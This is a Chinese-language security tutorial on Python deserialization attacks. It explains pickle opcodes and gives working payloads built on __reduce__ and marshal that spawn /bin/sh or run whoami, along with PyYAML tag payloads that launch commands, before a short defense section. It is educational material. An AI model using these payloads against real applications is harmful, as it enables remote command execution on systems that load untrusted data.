MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py

# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes

# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame

# Protocol 5
BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly

上文谈到了opcode是有多个版本的, 在进行序列化时可以通过protocol=num来选择opcode的版本, 指定的版本必须小于等于5.
import os
import pickle
class Demo:
    """Demonstration class whose pickled form carries a command invocation.

    WARNING: unpickling the serialized form of an instance calls
    ``os.system('whoami')``. Use only for illustrating why untrusted
    pickle data must never be loaded.
    """

    def __init__(self, name='h3rmesk1t'):
        # Plain attribute; it is not part of the pickled form because
        # __reduce__ below replaces the default reduction entirely.
        self.name = name

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle records."""
        return (os.system, ('whoami',))
demo = Demo()
# Serialize the same object under each pickle protocol (0 through 5) so the
# opcode streams can be compared side by side. Only dumps() is called here,
# so nothing is executed.
for i in range(6):
    print('[+] pickle v{}: {}'.format(i, pickle.dumps(demo, protocol=i)))
[+] pickle v0: b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'
[+] pickle v1: b'cposix\nsystem\nq\x00(X\x06\x00\x00\x00whoamiq\x01tq\x02Rq\x03.'
[+] pickle v2: b'\x80\x02cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v3: b'\x80\x03cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v4: b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
[+] pickle v5: b'\x80\x05\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
基本模式:
c<module>
<callable>
(<args>
tR.
这里用一段简短的字节码来演示利用过程:
cos
system
(S'whoami'
tR.
上文中的字节码其实就是__import__('os').system(*('whoami',)), 下面来分解分析一下:
cos => 引入模块 os.
system => 引用 system, 并将其添加到 stack.
(S'whoami' => 把当前 stack 存到 metastack, 清空 stack, 再将 'whoami' 压入 stack.
t => stack 中的值弹出并转为 tuple, 把 metastack 还原到 stack, 再将 tuple 压入 stack.
R => system(*('whoami',)).
. => 结束并返回当前栈顶元素.
需要注意的是, 并不是所有的对象都能使用pickle进行序列化和反序列化, 例如文件对象和网络套接字对象以及代码对象就不可以.
漏洞利用方式
漏洞产生的原因在于其可以将自定义的类进行序列化和反序列化, 反序列化后产生的对象会在结束时触发__reduce__()函数从而触发恶意代码.简单来说, __reduce__()魔术方法类似于PHP中的__wakeup()方法, 在反序列化时会先调用__reduce__()魔术方法.(准确地说, __reduce__()是在序列化时被调用的, 它返回的可调用对象及其参数会被写入序列化数据, 并在反序列化时被执行.)
如果返回值是一个字符串, 那么将会去当前作用域中查找字符串值对应名字的对象, 将其序列化之后返回.
如果返回值是一个元组, 要求是2到6个参数(Python3.8新加入元组的第六项).
第一个参数是可调用的对象.
第二个是该对象所需的参数元组, 如果可调用对象不接受参数则必须提供一个空元组.
第三个是用于表示对象的状态的可选元素, 将被传给前述的__setstate__()方法, 如果对象没有此方法, 则这个元素必须是字典类型并会被添加至__dict__属性中.
第四个是用于返回连续项的迭代器的可选元素.
第五个是用于返回连续键值对的迭代器的可选元素.
第六个是一个带有(obj, state)签名的可调用对象的可选元素.
基本 Payload
import os
import pickle
class Demo(object):
    """Minimal demonstration of a pickle reduction that names a command.

    WARNING: unpickling the serialized form of an instance calls
    ``os.system('/bin/sh')``. It exists only to show why ``pickle.loads``
    must never be applied to untrusted data.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle records."""
        shell = '/bin/sh'
        return (os.system, (shell,))


demo = Demo()
pickle.loads(pickle.dumps(demo))
Marshal 反序列化
由于pickle无法序列化code对象, 因此在python2.6后增加了一个marshal模块来处理code对象的序列化问题.
import base64
import marshal
def demo():
    """Sample function whose code object is serialized with marshal.

    It is never called in this snippet; calling it would start ``/bin/sh``.
    """
    import os
    os.system('/bin/sh')


# Serialize the function's code object. The function must not be called
# here: demo() would launch the shell and marshal its None return value
# instead of the code.
code_serialized = base64.b64encode(marshal.dumps(demo.__code__))
print(code_serialized)
但是marshal不能直接使用__reduce__, 因为__reduce__是利用调用某个callable并传递参数来执行的, 而marshal函数本身就是一个callable, 需要执行它, 而不是将它作为某个函数的参数.这时候就要利用上面分析的那个PVM操作码来进行构造了, 先写出来需要执行的内容, Python能通过types.FunctionType(func_code, globals(), '')()来动态地创建匿名函数, 这一部分的内容可以看官方文档的介绍.结合上文的示例代码, 最终要执行的是: (types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))().
这里直接贴一下别的师傅给出来的Payload模板.
import base64
import pickle
import marshal
def foo():
    """Sample payload body: run ``whoami`` and then start ``/bin/sh``.

    The surrounding snippet serializes this function's code object; the
    function itself is not called directly.
    """
    import os
    os.system('whoami;/bin/sh')  # evil code
# Hand-written protocol-0 pickle stream. When unpickled it evaluates
#   types.FunctionType(marshal.loads(base64.b64decode(<code>)), globals(), '')()
# with <code> filled in from foo's marshalled code object.
# NOTE: Python 2 only as written; it relies on the ``__builtin__`` module
# name and on the ``func_code`` function attribute.
# WARNING: loading this stream executes foo's body. Never unpickle
# untrusted data.
shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))
print(pickle.loads(shell))
PyYAML 反序列化
漏洞点
找到yaml/constructor.py文件, 查看文件代码中的三个特殊Python标签的源码:
!!python/object标签.
!!python/object/new标签.
!!python/object/apply标签.
这三个Python标签中都是调用了make_python_instance函数, 跟进查看该函数. 可以看到, 该函数会根据参数来动态创建新的Python类对象或通过引用module的类创建对象, 从而可以执行任意命令.
Payload(PyYaml < 5.1)
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
Payload(PyYaml >= 5.1)
from yaml import *
data = b"""!!python/object/apply:subprocess.Popen
- calc"""
deserialized_data = load(data, Loader=Loader)
print(deserialized_data)

from yaml import *
data = b"""!!python/object/apply:subprocess.Popen
- calc"""
deserialized_data = unsafe_load(data)
print(deserialized_data)
防御方法
采用更高级的接口__getnewargs__()、__getstate__()、__setstate__()等代替__reduce__()魔术方法.
进行反序列化操作之前进行严格的过滤, 若采用的是pickle库可采用装饰器实现.
参考链接：https://xz.aliyun.com/t/11082